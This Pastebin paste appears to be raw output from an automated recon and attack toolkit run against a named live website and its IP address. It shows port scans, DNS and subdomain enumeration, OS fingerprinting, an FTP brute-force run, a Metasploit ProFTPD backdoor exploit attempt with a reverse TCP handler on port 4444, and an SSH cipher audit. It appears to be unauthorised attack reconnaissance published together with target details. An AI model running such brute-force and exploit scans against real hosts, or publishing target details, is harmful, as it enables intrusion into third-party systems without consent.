Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #######################################################################################################################################
- Hostname euro.fashionmod.biz ISP Quasi Networks LTD. (AS29073)
- Continent Africa Flag
- SC
- Country Seychelles Country Code SC (SYC)
- Region Unknown Local time 30 Sep 2017 01:21 +04
- City Unknown Latitude -4.583
- IP Address 80.82.69.63 Longitude 55.667
- #######################################################################################################################################
- HunterUnit JTSEC full Recon Anonymous #1
- [i] Scanning Site: http://euro.fashionmod.biz
- B A S I C I N F O
- ====================
- [+] Site Title: Euro Idols - Nonude Video Models from Europe !
- [+] IP address: 80.82.69.63
- [+] Web Server: Apache/2
- [+] CMS: Could Not Detect
- [+] Cloudflare: Not Detected
- [+] Robots File: Could NOT Find robots.txt!
- W H O I S L O O K U P
- ========================
- No Data Found
- >>> Last update of WHOIS database: 2017-09-29T21:23:47Z <<<
- For more information on Whois status codes, please visit https://icann.org/epp
- NeuStar, Inc., the Registry Operator for .BIZ, has collected this information for the WHOIS database through an ICANN-Accredited Registrar. This information is provided to you for informational purposes only and is designed to assist persons in determining contents of a domain name registration record in the NeuStar registry database. NeuStar makes this information available to you "as is" and does not guarantee its accuracy. By submitting a WHOIS query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data: (1) to allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone; (2) in contravention of any applicable data and privacy protection acts; or (3) to enable high volume, automated, electronic processes that apply to the registry (or its systems). Compilation, repackaging, dissemination, or other use of the WHOIS database in its entirety, or of a substantial portion thereof, is not allowed without NeuStar's prior written permission. NeuStar reserves the right to modify or change these conditions at any time without prior or subsequent notification of any kind. By executing this query, in any manner whatsoever, you agree to abide by these terms.
- G E O I P L O O K U P
- =========================
- [i] IP Address: 80.82.69.63
- [i] Country: SC
- [i] State: N/A
- [i] City: N/A
- [i] Latitude: -4.583300
- [i] Longitude: 55.666698
- H T T P H E A D E R S
- =======================
- [i] HTTP/1.1 200 OK
- [i] Date: Fri, 29 Sep 2017 21:30:17 GMT
- [i] Server: Apache/2
- [i] Last-Modified: Sun, 05 Feb 2012 19:22:46 GMT
- [i] ETag: "113c-4b83c787f4d80"
- [i] Accept-Ranges: bytes
- [i] Content-Length: 4412
- [i] Vary: Accept-Encoding,User-Agent
- [i] Connection: close
- [i] Content-Type: text/html
- D N S L O O K U P
- ===================
- euro.fashionmod.biz. 14394 IN A 80.82.69.63
- S U B N E T C A L C U L A T I O N
- ====================================
- Address = 80.82.69.63
- Network = 80.82.69.63 / 32
- Netmask = 255.255.255.255
- Broadcast = not needed on Point-to-Point links
- Wildcard Mask = 0.0.0.0
- Hosts Bits = 0
- Max. Hosts = 1 (2^0 - 0)
- Host Range = { 80.82.69.63 - 80.82.69.63 }
- N M A P P O R T S C A N
- ============================
- Starting Nmap 7.01 ( https://nmap.org ) at 2017-09-29 21:23 UTC
- Nmap scan report for euro.fashionmod.biz (80.82.69.63)
- Host is up (0.084s latency).
- rDNS record for 80.82.69.63: jademonitor.net
- PORT STATE SERVICE VERSION
- 21/tcp open ftp ProFTPD
- 22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
- 23/tcp closed telnet
- 25/tcp open smtp Exim smtpd 4.84
- 80/tcp open http?
- 110/tcp open pop3 Dovecot DirectAdmin pop3d
- 143/tcp open imap Dovecot imapd
- 443/tcp open ssl/https?
- 445/tcp closed microsoft-ds
- 3389/tcp closed ms-wbt-server
- 2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
- S U B - D O M A I N F I N D E R
- ==================================
- [i] Total Subdomains Found : 1
- [+] Subdomain: euro.fashionmod.biz
- [-] IP: 80.82.69.63
- [*] Performing TLD Brute force Enumeration against euro.fashionmod.biz
- [*] The operation could take up to: 00:01:07
- [*] A euro.ae 142.4.215.195
- [*] A euro.aero 64.71.35.18
- [*] A euro.biz.af 5.45.75.45
- [*] A euro.af 108.61.170.199
- [*] AAAA euro.af 2001:19f0:6c01:547:5400:ff:fe7c:9f77
- [*] A euro.ai 52.36.140.12
- [*] A euro.ai 52.35.190.21
- [*] A euro.com.ar 200.58.111.188
- [*] A euro.asia 185.53.178.9
- [*] A euro.at 83.64.162.52
- [*] A euro.co.at 81.223.238.243
- [*] CNAME euro.biz.at free.biz.at
- [*] A free.biz.at 216.92.134.29
- [*] A euro.am 185.4.73.83
- [*] A euro.net.au 198.57.189.37
- [*] A euro.co.asia 91.195.240.135
- [*] A euro.com.ax 185.55.85.123
- [*] A euro.com.au 203.210.100.177
- [*] A euro.org.ax 185.55.85.123
- [*] A euro.org.aw 142.4.20.12
- [*] A euro.com.ba 195.222.33.180
- [*] A euro.co.ba 176.9.45.78
- [*] A euro.be 193.53.58.203
- [*] A euro.com.be 95.173.170.166
- [*] A euro.bg 212.116.131.26
- [*] A euro.by 93.171.222.16
- [*] A euro.biz.bz 199.59.242.150
- [*] A euro.net.bz 50.63.202.9
- [*] A euro.bz 209.99.40.225
- [*] A euro.ca 184.168.221.96
- [*] A euro.cc 50.22.154.126
- [*] A euro.net.cc 54.252.89.206
- [*] A euro.com.cc 54.252.107.64
- [*] A euro.biz.by 71.18.52.2
- [*] A euro.co.cc 175.126.123.219
- [*] A euro.org.ch 72.52.4.122
- [*] A euro.co.cm 85.25.140.105
- [*] A euro.net.cm 85.25.140.105
- [*] A euro.biz.cl 185.53.178.8
- [*] A euro.cl 200.27.123.2
- [*] A euro.cn 72.52.4.119
- [*] A euro.co 208.73.211.70
- [*] CNAME euro.biz.cm i.cns.cm
- [*] A i.cns.cm 118.184.56.30
- [*] A euro.net.cn 47.89.58.32
- [*] A euro.com.co 69.175.31.216
- [*] A euro.com.com 52.33.196.199
- [*] A euro.com 23.23.86.44
- [*] A euro.net.com 199.59.242.150
- [*] A euro.co.com 173.192.115.17
- [*] A euro.org.com 23.23.86.44
- [*] CNAME euro.org.cn e.dcoin.co
- [*] A e.dcoin.co 170.178.178.62
- [*] A euro.com.cn 103.232.215.138
- [*] A euro.biz.cr 72.52.4.122
- [*] A euro.biz.cx 72.52.4.122
- [*] A euro.cz 5.198.130.9
- [*] A euro.biz.cz 185.53.179.7
- [*] A euro.com.cz 62.109.128.30
- [*] A euro.net.cz 80.250.24.177
- [*] CNAME euro.co.de co.de
- [*] A co.de 144.76.162.245
- [*] A euro.com.de 50.56.68.37
- [*] CNAME euro.org.de www.org.de
- [*] A www.org.de 78.47.128.8
- [*] A euro.de 194.97.132.68
- [*] A euro.dj 74.200.91.26
- [*] CNAME euro.cx cx.00633.net
- [*] A cx.00633.net 66.154.123.233
- [*] A euro.dk 94.231.103.141
- [*] A euro.com.es 37.59.114.67
- [*] A euro.ee 212.47.208.244
- [*] A euro.net.eu 78.46.90.98
- [*] A euro.org.eu 78.46.90.98
- [*] A euro.fi 213.214.178.2
- [*] A euro.biz.fi 185.55.85.123
- [*] CNAME euro.com.fi dnspod-vip3.mydnspod.net
- [*] A dnspod-vip3.mydnspod.net 119.28.48.218
- [*] A dnspod-vip3.mydnspod.net 119.28.48.237
- [*] A euro.fm 173.230.131.38
- [*] A euro.biz.fm 173.230.131.38
- [*] A euro.fr 95.128.42.135
- [*] A euro.gd 89.31.143.1
- [*] A euro.ge 66.96.149.1
- [*] A euro.org.fr 149.202.133.35
- [*] A euro.biz.gl 72.52.4.122
- [*] CNAME euro.co.gp co.gp
- [*] A co.gp 144.76.162.245
- [*] A euro.gr 185.25.20.210
- [*] A euro.co.hn 208.100.40.203
- [*] A euro.hm 66.96.149.22
- [*] A euro.com.hk 116.251.206.69
- [*] CNAME euro.net.hr net.hr
- [*] A net.hr 192.0.78.24
- [*] A net.hr 192.0.78.25
- [*] CNAME euro.biz.hn parkmydomain.vhostgo.com
- [*] CNAME parkmydomain.vhostgo.com westuser.dopa.com
- [*] A westuser.dopa.com 107.186.245.119
- [*] A euro.co.ht 72.52.4.122
- [*] A euro.co.hu 87.229.26.126
- [*] A euro.ie 137.191.225.153
- [*] A euro.co.il 216.14.208.160
- [*] A euro.im 109.68.33.18
- [*] A euro.co.in 185.53.178.8
- [*] A euro.info 212.77.241.50
- [*] A euro.io 54.204.35.112
- [*] A euro.is 185.107.60.18
- [*] A euro.ir 212.33.197.74
- [*] A euro.it 62.149.206.4
- [*] A euro.co.jobs 50.17.193.222
- [*] A euro.net.jobs 50.19.241.165
- [*] A euro.com.jobs 50.19.241.165
- [*] A euro.org.jobs 50.19.241.165
- [*] A euro.biz.jobs 50.19.241.165
- [*] A euro.in 52.58.78.16
- [*] A euro.co.jp 157.7.107.189
- [*] A euro.jp 27.134.252.194
- [*] A euro.kg 212.42.102.209
- [*] A euro.kr 69.172.201.153
- [*] A euro.co.kr 116.41.245.148
- [*] A euro.biz.ky 199.184.144.27
- [*] A euro.kz 178.162.211.68
- [*] A euro.la 173.230.141.80
- [*] A euro.lc 144.76.162.245
- [*] A euro.li 185.133.192.32
- [*] A euro.li 78.129.180.203
- [*] CNAME euro.biz.li 712936.parkingcrew.net
- [*] A 712936.parkingcrew.net 185.53.179.29
- [*] A euro.lt 193.200.124.198
- [*] A euro.biz.lu 195.26.5.2
- [*] A euro.lu 94.130.21.211
- [*] A euro.lv 80.232.240.33
- [*] A euro.biz.ly 64.136.20.39
- [*] A euro.ma 79.143.185.247
- [*] A euro.biz.md 72.52.4.122
- [*] A euro.me 50.63.201.98
- [*] A euro.mk 94.130.15.209
- [*] A euro.co.mk 87.76.31.211
- [*] A euro.mn 202.131.250.34
- [*] A euro.mobi 50.63.202.14
- [*] A euro.ms 213.165.64.40
- [*] A euro.com.mt 78.46.108.104
- [*] A euro.co.mobi 54.225.105.179
- [*] A euro.mx 72.52.4.119
- [*] A euro.com.my 103.27.74.14
- [*] A euro.biz.my 202.190.174.44
- [*] A euro.my 202.171.47.209
- [*] A euro.net.net 52.50.81.210
- [*] A euro.co.net 188.166.216.219
- [*] A euro.net 194.134.0.9
- [*] A euro.co.nf 185.176.43.57
- [*] A euro.org.net 23.23.86.44
- [*] A euro.com.nl 83.98.157.102
- [*] A euro.net.nl 83.98.157.102
- [*] A euro.no 213.162.241.24
- [*] A euro.co.nr 208.100.40.202
- [*] A euro.nu 80.92.84.139
- [*] CNAME euro.co.nu co.nu
- [*] A co.nu 144.76.162.245
- [*] A euro.com.nu 144.76.162.245
- [*] A euro.org.nu 80.92.84.139
- [*] A euro.net.nu 199.102.76.78
- [*] A euro.com.org 23.23.86.44
- [*] A euro.co.nz 210.5.50.143
- [*] CNAME euro.net.org pewtrusts.org
- [*] A pewtrusts.org 204.74.99.100
- [*] A euro.net.nz 202.124.241.178
- [*] A euro.pe 67.205.190.182
- [*] A euro.ph 72.52.4.119
- [*] A euro.co.ph 45.79.222.138
- [*] A euro.com.ph 45.79.222.138
- [*] A euro.net.ph 45.79.222.138
- [*] A euro.org.ph 45.79.222.138
- [*] A euro.co.nl 85.214.225.251
- [*] A euro.pk 109.235.50.223
- [*] A euro.pl 5.35.240.54
- [*] A euro.com.pk 192.254.171.142
- [*] A euro.com.pl 155.133.77.32
- [*] A euro.co.pl 212.91.7.33
- [*] A euro.net.pl 91.207.68.6
- [*] A euro.org.pm 208.73.210.217
- [*] A euro.org.pm 208.73.210.202
- [*] A euro.org.pm 208.73.211.177
- [*] A euro.org.pm 208.73.211.165
- [*] A euro.pn 50.63.75.1
- [*] A euro.org.pl 128.204.219.98
- [*] A euro.pro 199.59.242.150
- [*] A euro.co.ps 66.96.132.56
- [*] CNAME euro.biz.ps biz.ps
- [*] A biz.ps 144.76.162.245
- [*] A euro.co.pt 194.107.127.52
- [*] A euro.pw 141.8.226.58
- [*] A euro.net.pw 141.8.226.59
- [*] A euro.co.pw 141.8.226.59
- [*] A euro.biz.pw 141.8.226.59
- [*] A euro.org.pw 141.8.226.59
- [*] A euro.com.qa 82.148.100.102
- [*] A euro.net.ro 69.64.52.127
- [*] A euro.org.re 217.70.184.38
- [*] A euro.ro 149.202.210.36
- [*] AAAA euro.ro 2001:41d0:1000:1424::1
- [*] A euro.com.ro 5.154.178.232
- [*] A euro.rs 194.9.95.207
- [*] A euro.co.ru 194.186.47.52
- [*] A euro.net.ru 185.53.178.6
- [*] A euro.biz.pl 212.91.6.58
- [*] A euro.biz.pl 212.91.7.33
- [*] A euro.ru 178.162.211.68
- [*] A euro.com.ru 194.85.61.78
- [*] A euro.com.ru 109.70.26.36
- [*] A euro.org.ru 185.53.179.7
- [*] A euro.biz.se 185.53.179.6
- [*] CNAME euro.net.se 773147.parkingcrew.net
- [*] A 773147.parkingcrew.net 185.53.179.29
- [*] A euro.se 93.188.2.51
- [*] A euro.si 78.46.108.104
- [*] A euro.com.sg 101.100.204.56
- [*] A euro.co.sl 91.195.240.135
- [*] A euro.com.sr 143.95.106.249
- [*] A euro.biz.st 91.121.28.115
- [*] A euro.co.su 72.52.4.122
- [*] A euro.biz.tc 64.136.20.39
- [*] A euro.biz.tf 85.236.153.18
- [*] A euro.net.tf 188.40.117.12
- [*] A euro.net.tf 188.40.70.27
- [*] A euro.net.tf 188.40.70.29
- [*] A euro.co.tl 208.100.40.202
- [*] A euro.tel 52.50.143.27
- [*] A euro.tj 83.220.171.27
- [*] A euro.tn 146.255.44.1
- [*] A euro.co.to 175.118.124.44
- [*] A euro.travel 51.254.41.57
- [*] A euro.tv 208.73.210.217
- [*] A euro.tv 208.73.210.202
- [*] A euro.tv 208.73.211.165
- [*] A euro.tv 208.73.211.177
- [*] A euro.co.tv 31.186.25.163
- [*] A euro.com.tr 213.143.230.11
- [*] A euro.biz.tv 72.52.4.122
- [*] A euro.org.tv 72.52.4.122
- [*] A euro.tw 69.64.147.242
- [*] A euro.com.tw 59.124.247.129
- [*] A euro.ua 194.44.214.18
- [*] A euro.co.ua 37.140.192.127
- [*] A euro.com.ua 5.101.115.201
- [*] A euro.biz.ua 185.68.16.97
- [*] AAAA euro.biz.ua 2a00:7a60:0:1061::1
- [*] A euro.co.uk 88.208.252.218
- [*] A euro.us 74.208.236.75
- [*] A euro.org.ua 66.85.100.43
- [*] A euro.org.uk 37.61.238.6
- [*] CNAME euro.biz.uz biz.uz
- [*] A biz.uz 144.76.162.245
- [*] A euro.uz 46.30.40.94
- [*] A euro.vc 69.64.147.242
- [*] A euro.com.ve 104.27.131.209
- [*] A euro.com.ve 104.27.130.209
- [*] AAAA euro.com.ve 2400:cb00:2048:1::681b:83d1
- [*] AAAA euro.com.ve 2400:cb00:2048:1::681b:82d1
- [*] A euro.vg 88.198.29.97
- [*] A euro.co.vg 88.198.29.97
- [*] A euro.com.vg 88.198.29.97
- [*] A euro.net.vg 68.178.254.180
- [*] A euro.biz.vg 89.31.143.20
- [*] A euro.com.vn 112.78.10.68
- [*] A euro.com.ws 202.4.48.211
- [*] A euro.net.ws 202.4.48.211
- [*] A euro.org.ws 202.4.48.211
- [*] A euro.biz.ws 184.168.221.104
- [*] A euro.ws 119.81.170.18
- [*] CNAME euro.co.vu www.euro.co.vu
- [*] CNAME www.euro.co.vu ghs.google.com
- [*] A ghs.google.com 172.217.11.19
- [*] CNAME euro.co.vu www.euro.co.vu
- [*] CNAME www.euro.co.vu ghs.google.com
- [*] AAAA ghs.google.com 2607:f8b0:4006:819::2013
- [+] 255 Records Found
- + -- ----------------------------=[Running Nslookup]=------------------------ -- +
- Server: 192.168.1.254
- Address: 192.168.1.254#53
- Non-authoritative answer:
- Name: euro.fashionmod.biz
- Address: 80.82.69.63
- euro.fashionmod.biz has address 80.82.69.63
- + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +
- Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
- [+] Target is euro.fashionmod.biz
- [+] Loading modules.
- [+] Following modules are loaded:
- [x] [1] ping:icmp_ping - ICMP echo discovery module
- [x] [2] ping:tcp_ping - TCP-based ping discovery module
- [x] [3] ping:udp_ping - UDP-based ping discovery module
- [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
- [x] [5] infogather:portscan - TCP and UDP PortScanner
- [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
- [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
- [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
- [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
- [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
- [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
- [x] [12] fingerprint:smb - SMB fingerprinting module
- [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
- [+] 13 modules registered
- [+] Initializing scan engine
- [+] Running scan engine
- [-] ping:tcp_ping module: no closed/open TCP ports known on 80.82.69.63. Module test failed
- [-] ping:udp_ping module: no closed/open UDP ports known on 80.82.69.63. Module test failed
- [-] No distance calculation. 80.82.69.63 appears to be dead or no ports known
- [+] Host: 80.82.69.63 is up (Guess probability: 50%)
- [+] Target: 80.82.69.63 is alive. Round-Trip Time: 0.50365 sec
- [+] Selected safe Round-Trip Time value is: 1.00731 sec
- [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
- [-] fingerprint:smb need either TCP port 139 or 445 to run
- [-] fingerprint:snmp: need UDP port 161 open
- [+] Primary guess:
- [+] Host 80.82.69.63 Running OS: �v���U (Guess probability: 96%)
- [+] Other guesses:
- [+] Host 80.82.69.63 Running OS: �v���U (Guess probability: 96%)
- [+] Host 80.82.69.63 Running OS: �v���U (Guess probability: 96%)
- [+] Host 80.82.69.63 Running OS: �v���U (Guess probability: 96%)
- [+] Host 80.82.69.63 Running OS: �v���U (Guess probability: 96%)
- [+] Host 80.82.69.63 Running OS: �v���U (Guess probability: 96%)
- [+] Host 80.82.69.63 Running OS: �v���U (Guess probability: 96%)
- [+] Host 80.82.69.63 Running OS: �v���U (Guess probability: 96%)
- [+] Host 80.82.69.63 Running OS: �v���U (Guess probability: 96%)
- [+] Host 80.82.69.63 Running OS: �v���U (Guess probability: 96%)
- [+] Cleaning up scan engine
- [+] Modules deinitialized
- [+] Execution completed.
- + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +
- No Data Found
- >>> Last update of WHOIS database: 2017-09-29T21:23:04Z <<<
- For more information on Whois status codes, please visit https://icann.org/epp
- NeuStar, Inc., the Registry Operator for .BIZ, has collected this information for the WHOIS database through an ICANN-Accredited Registrar. This information is provided to you for informational purposes only and is designed to assist persons in determining contents of a domain name registration record in the NeuStar registry database. NeuStar makes this information available to you "as is" and does not guarantee its accuracy. By submitting a WHOIS query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data: (1) to allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone; (2) in contravention of any applicable data and privacy protection acts; or (3) to enable high volume, automated, electronic processes that apply to the registry (or its systems). Compilation, repackaging, dissemination, or other use of the WHOIS database in its entirety, or of a substantial portion thereof, is not allowed without NeuStar's prior written permission. NeuStar reserves the right to modify or change these conditions at any time without prior or subsequent notification of any kind. By executing this query, in any manner whatsoever, you agree to abide by these terms.
- + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +
- *******************************************************************
- * *
- * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
- * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
- * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
- * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
- * *
- * TheHarvester Ver. 2.7 *
- * Coded by Christian Martorella *
- * Edge-Security Research *
- * cmartorella@edge-security.com *
- *******************************************************************
- [-] Searching in Bing:
- Searching 50 results...
- Searching 100 results...
- [+] Emails found:
- ------------------
- No emails found
- [+] Hosts found in search engines:
- ------------------------------------
- [-] Resolving hostnames IPs...
- 80.82.69.63:www.euro.fashionmod.biz
- + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +
- ; <<>> DiG 9.10.3-P4-Debian <<>> -x euro.fashionmod.biz
- ;; global options: +cmd
- ;; Got answer:
- ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 18277
- ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
- ;; OPT PSEUDOSECTION:
- ; EDNS: version: 0, flags:; udp: 4096
- ;; QUESTION SECTION:
- ;biz.fashionmod.euro.in-addr.arpa. IN PTR
- ;; AUTHORITY SECTION:
- in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2017043204 1800 900 604800 3600
- ;; Query time: 262 msec
- ;; SERVER: 192.168.1.254#53(192.168.1.254)
- ;; WHEN: Fri Sep 29 17:23:21 EDT 2017
- ;; MSG SIZE rcvd: 129
- Smartmatch is experimental at /usr/bin/dnsenum line 698.
- Smartmatch is experimental at /usr/bin/dnsenum line 698.
- dnsenum VERSION:1.2.4
- ----- euro.fashionmod.biz -----
- Host's addresses:
- __________________
- euro.fashionmod.biz. 14377 IN A 80.82.69.63
- Name Servers:
- ______________
- euro.fashionmod.biz NS record query failed: NOERROR
- + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +
- ____ _ _ _ _ _____
- / ___| _ _| |__ | (_)___| |_|___ / _ __
- \___ \| | | | '_ \| | / __| __| |_ \| '__|
- ___) | |_| | |_) | | \__ \ |_ ___) | |
- |____/ \__,_|_.__/|_|_|___/\__|____/|_|
- # Coded By Ahmed Aboul-Ela - @aboul3la
- [-] Enumerating subdomains now for euro.fashionmod.biz
- [-] verbosity is enabled, will show the subdomains results in realtime
- [-] Searching now in Baidu..
- [-] Searching now in Yahoo..
- [-] Searching now in Google..
- [-] Searching now in Bing..
- [-] Searching now in Ask..
- [-] Searching now in Netcraft..
- [-] Searching now in DNSdumpster..
- [-] Searching now in Virustotal..
- [-] Searching now in ThreatCrowd..
- [-] Searching now in SSL Certificates..
- [-] Searching now in PassiveDNS..
- Virustotal: www.euro.fashionmod.biz
- [-] Saving results to file: /usr/share/sniper/loot/domains/domains-euro.fashionmod.biz.txt
- [-] Total Unique Subdomains Found: 1
- www.euro.fashionmod.biz
- ╔═╗╦═╗╔╦╗╔═╗╦ ╦
- ║ ╠╦╝ ║ ╚═╗╠═╣
- ╚═╝╩╚═ ╩o╚═╝╩ ╩
- + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +
- [+] Domains saved to: /usr/share/sniper/loot/domains/domains-euro.fashionmod.biz-full.txt
- + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +
- + -- ----------------------------=[Checking Email Security]=----------------- -- +
- + -- ----------------------------=[Pinging host]=---------------------------- -- +
- PING euro.fashionmod.biz (80.82.69.63) 56(84) bytes of data.
- 64 bytes from jademonitor.net (80.82.69.63): icmp_seq=1 ttl=58 time=121 ms
- --- euro.fashionmod.biz ping statistics ---
- 1 packets transmitted, 1 received, 0% packet loss, time 0ms
- rtt min/avg/max/mdev = 121.888/121.888/121.888/0.000 ms
- + -- ----------------------------=[Running TCP port scan]=------------------- -- +
- Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-29 17:23 EDT
- Nmap scan report for euro.fashionmod.biz (80.82.69.63)
- Host is up (0.25s latency).
- rDNS record for 80.82.69.63: jademonitor.net
- Not shown: 454 closed ports, 8 filtered ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 53/tcp open domain
- 80/tcp open http
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 993/tcp open imaps
- 995/tcp open pop3s
- 2222/tcp open EtherNetIP-1
- 3306/tcp open mysql
- Nmap done: 1 IP address (1 host up) scanned in 6.60 seconds
- + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +
- + -- --=[Port 21 opened... running tests...
- Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-29 17:24 EDT
- Nmap scan report for euro.fashionmod.biz (80.82.69.63)
- Host is up (0.16s latency).
- rDNS record for 80.82.69.63: jademonitor.net
- PORT STATE SERVICE VERSION
- 21/tcp open ftp ProFTPD
- | ftp-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 2194 guesses in 181 seconds, average tps: 11.9
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Aggressive OS guesses: Linux 2.6.39 (99%), Linux 2.6.32 (94%), Linux 3.4 (94%), WatchGuard Fireware 11.8 (94%), Synology DiskStation Manager 5.1 (94%), Linux 2.6.18 - 2.6.22 (94%), Linux 3.10 (94%), Linux 3.1 - 3.2 (93%), Linux 2.6.32 or 3.10 (93%), Linux 2.6.32 - 2.6.39 (92%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 10 hops
- Service Info: OS: Unix
- TRACEROUTE (using port 21/tcp)
- HOP RTT ADDRESS
- 1 111.41 ms 10.13.0.1
- 2 111.45 ms 37.187.24.252
- 3 111.45 ms po101.gra-g1-a75.fr.eu (178.33.103.229)
- 4 ...
- 5 120.17 ms be100-1109.fra-1-a9.de.eu (213.186.32.213)
- 6 ...
- 7 127.71 ms vlan3555.bb1.ams2.nl.m247.com (176.10.83.128)
- 8 127.70 ms 176.10.83.119
- 9 ...
- 10 121.48 ms jademonitor.net (80.82.69.63)
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 198.30 seconds
- _ _
- / \ /\ __ _ __ /_/ __
- | |\ / | _____ \ \ ___ _____ | | / \ _ \ \
- | | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
- |_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
- |/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\
- =[ metasploit v4.16.8-dev ]
- + -- --=[ 1684 exploits - 964 auxiliary - 299 post ]
- + -- --=[ 498 payloads - 40 encoders - 10 nops ]
- + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
- [*] Processing /root/.msf4/msfconsole.rc for ERB directives.
- resource (/root/.msf4/msfconsole.rc)> “spool /root/msf_console.log”
- [-] Unknown command: “spool.
- RHOST => euro.fashionmod.biz
- RHOSTS => euro.fashionmod.biz
- [*] euro.fashionmod.biz:21 - Banner: 220 ProFTPD Server ready.
- [*] euro.fashionmod.biz:21 - USER: 331 Password required for VqzMf5:)
- [*] Exploit completed, but no session was created.
- [*] Started reverse TCP double handler on 10.13.0.22:4444
- [*] euro.fashionmod.biz:21 - Sending Backdoor Command
- [-] euro.fashionmod.biz:21 - Not backdoored
- [*] Exploit completed, but no session was created.
- + -- --=[Port 22 opened... running tests...
- # general
- (gen) banner: SSH-2.0-OpenSSH_5.3
- (gen) software: OpenSSH 5.3
- (gen) compatibility: OpenSSH 5.9-6.6, Dropbear SSH 2013.56+ (some functionality from 0.52)
- (gen) compression: enabled (zlib@openssh.com)
- # key exchange algorithms
- (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
- `- [info] available since OpenSSH 4.4
- (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.3.0
- (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
- (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
- `- [warn] using small 1024-bit modulus
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
- # host-key algorithms
- (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
- (key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
- `- [warn] using small 1024-bit modulus
- `- [warn] using weak random number generator could reveal the key
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- # encryption algorithms (ciphers)
- (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) aes192-ctr -- [info] available since OpenSSH 3.7
- (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) arcfour256 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher
- `- [info] available since OpenSSH 4.2
- (enc) arcfour128 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher
- `- [info] available since OpenSSH 4.2
- (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
- (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
- (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [fail] disabled since Dropbear SSH 0.53
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
- (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
